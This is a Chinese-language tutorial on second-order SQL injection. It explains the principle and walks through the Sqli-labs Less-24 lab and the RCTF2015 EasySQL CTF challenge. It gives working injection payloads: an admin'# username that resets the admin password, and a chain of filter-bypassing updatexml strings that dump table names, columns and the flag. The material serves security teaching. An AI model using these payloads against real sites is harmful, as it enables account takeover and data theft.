WEB漏洞攻防 - SQL注入 - 二次注入

二次注入

一句话概括 - 逻辑设计上导致的先写入再注入。

应用功能逻辑设计上导致的先写入后组合的注入(注入的一种分类,逻辑设计上存在的问题,先写入,再注入!)

可以理解为攻击者构造的恶意数据先存储在数据库,恶意数据被读取并在特定的场景执行SQL查询语句所导致的注入攻击。


原理  1、当用户输入恶意数据时,网站对我们输入的重要的关键字进行了转义,然后存储到数据库。  2、已经存储到数据库的数据,默认下时安全的。该恶意数据在一定场景条件下,比如当Web程序调用存储在数据库中的恶意数据并执行    SQL查询时,没有被转义使用也没有进行进一步的检验的处理。就造成了二次注入。[二次注入具有一次攻击注入漏洞的相同攻击威力] 

二次注入实例 - Sqlilabs-less24

在关卡首页,我们看到 “New User click here” 注册新用户的页面,新增用户的操作即 “insert” 语句,这里我们可以考虑如何将恶意语句带入数据库。


WEB漏洞攻防 - SQL注入 - 二次注入
WEB漏洞攻防 - SQL注入 - 二次注入

我们不妨来思考一下,大胆的猜测新增用户的 “insert” 语句。

insert into user (username,password,...)values(value1,values2,...);

再大胆猜测一下变更密码的 “update” 语句。

update user set password=value1 where username = 'username' and password = oldpassword;

这里我们发现,执行变更语句的时候必须带有子查询的一个条件约束,那就是 “username” 。

OK,这里我们构造一个恶意语句的用户名,让其在执行 “update” 语句的时候造成闭合。 admin#


WEB漏洞攻防 - SQL注入 - 二次注入
WEB漏洞攻防 - SQL注入 - 二次注入

再变更密码!


WEB漏洞攻防 - SQL注入 - 二次注入

这里我们分析一下变更 admin’# 的语句

update user set password=123456 where username = 'admin'#' and password = 123;

可以看出 ‘#’ 注释后面的语句注释掉没有执行,直接变更了 admin 账号的密码为 123456。

尝试登录 admin 试试 。


WEB漏洞攻防 - SQL注入 - 二次注入

登录成功,说名我们利用构造的恶意数据进行二次注入成功了。

以上就是一个简单的二次注入靶场案例讲解。

二次注入实例 - CTF - [RCTF2015]EasySQL

功能点:注册-登录-修改(insert-select-update)
确定注入点-构造Payload-确定过滤-重新构造Payload


看看题目,单从访问页面,我们可以看到页面有 "LOGIN、REGISTER"两个功能。先注册一个账号登录试试。 “test/test”


WEB漏洞攻防 - SQL注入 - 二次注入

然后登录,发现有个类似个人中心的地方,点进去发现有个 “change_password” 功能。


WEB漏洞攻防 - SQL注入 - 二次注入

跟具常规的 update 语句可以确定的使目前存在 username、password两个变量,但是一般password存在加密的情况,所以这里受控的可控变量就只有 username 了。

update user set password=value1 where username = 'username' and password = oldpassword;

现在我们尝试构造一个恶意的 username

test" or updatexml(1,concat(0x7e,(version())),0)#

注册失败,说明有关键字过滤,将我们的 username 尝试爆破一下看看过滤了哪些关键字。[发现过滤的是 or 和空格被过滤]


WEB漏洞攻防 - SQL注入 - 二次注入
WEB漏洞攻防 - SQL注入 - 二次注入
WEB漏洞攻防 - SQL注入 - 二次注入
WEB漏洞攻防 - SQL注入 - 二次注入

既然屏蔽了 or 关键字,我们可以使用" ^ “代替[在SQL中” ^ "表示进行按位异或运算,可以代替 or]

再次构建恶意用户名[注册成功]

test"^updatexml(1,concat(0x7e,(database())),0)#


WEB漏洞攻防 - SQL注入 - 二次注入

进入个人中心,执行变更密码的操作[成功爆出用户名]


WEB漏洞攻防 - SQL注入 - 二次注入

OK!看来可行,可以利用构造不同的恶意用户名,变更oldpassword的方式进行注入,注出flag!


test"^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)#  test"^updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag'))),1)#  test"^updatexml(1,concat(0x7e,(select(group_concat(flag))from(flag))),1)#  test"^updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1)#  test"^updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users))),1)#  test"^updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1)#  test"^updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1)# 

版权声明:玥玥 发表于 2021-08-04 1:23:32。
转载请注明:WEB漏洞攻防 - SQL注入 - 二次注入 | 女黑客导航